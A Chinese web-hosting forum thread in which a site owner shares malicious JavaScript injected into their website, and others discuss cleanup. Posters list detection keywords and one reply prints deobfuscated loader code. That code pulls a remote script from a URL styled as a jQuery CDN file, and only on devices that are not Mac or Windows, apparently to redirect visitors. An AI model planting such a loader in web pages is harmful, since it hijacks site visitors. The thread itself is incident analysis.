全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 1208|回复: 16
打印 上一主题 下一主题

网站被挂马了,挂马js发出来给大家

[复制链接]
跳转到指定楼层
1#
发表于 2025-8-18 01:06:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
js马代码发出来,大家研究

1.zip (1 KB, 下载次数: 41)
2#
发表于 2025-8-18 01:09:49 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
3#
 楼主| 发表于 2025-8-18 01:36:59 | 只看该作者
美女约吗 发表于 2025-8-18 01:09
直接发js代码不就行了吗?为什么要打包呢?

hostloc禁止发,你试试
4#
发表于 2025-8-18 01:41:35 | 只看该作者
本帖最后由 海的那一边 于 2025-8-18 01:48 编辑
nk123 发表于 2025-8-18 01:36
hostloc禁止发,你试试


问ai结果删除以下代码段:
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/



全面排查网站文件:

攻击者可能不止在一处植入了代码。请仔细检查所有网站文件,特别是最近被修改过的文件,查找类似特征的混淆代码。可以搜索文件中是否包含 eval, aPnDhiTia, xxSJRox 等关键词。

代码末尾的注释 /*138ae887806f*/ 可能是攻击者的一个标识,您也可以尝试在所有文件中搜索这个字符串。
5#
发表于 2025-8-18 11:02:49 | 只看该作者
海的那一边 发表于 2025-8-18 01:41
问ai结果删除以下代码段:
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/

前段时间我就发过帖子了 https://443502.xyz/thread-1424027-1-1.html
6#
发表于 2025-8-18 13:13:35 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
8#
发表于 2025-8-18 15:10:34 | 只看该作者
gpt给还原后的代码
  1. function loadJQuery() {
  2.     // jQuery 3.6.8 CDN
  3.     var url = "https://code.jquery.com/jquery.min-3.6.8.js";

  4.     // 创建 script 标签
  5.     var script = document.createElement("script");
  6.     script.type = "text/javascript";
  7.     script.src = url;

  8.     // 加载完成的回调(原代码里是个空函数)
  9.     script.onload = function () {
  10.         console.log("jQuery 已加载:", url);
  11.     };

  12.     // 插入到 <head>
  13.     document.head.appendChild(script);
  14. }

  15. // 如果不是 Mac 或 Windows 平台,就执行加载
  16. if (!(/^Mac|Win/.test(navigator.platform))) {
  17.     loadJQuery();
  18. }
复制代码
9#
 楼主| 发表于 2025-8-18 15:31:20 | 只看该作者
美女约吗 发表于 2025-8-18 13:13
这代码是跳广告还是

跳转
10#
发表于 2025-8-18 15:37:34 | 只看该作者
月初的时候WP也被入侵了,只修改了WP站点文件。。
WP貌似被黑过三四次了。。。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-9-7 13:55 , Processed in 0.066422 second(s), 10 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表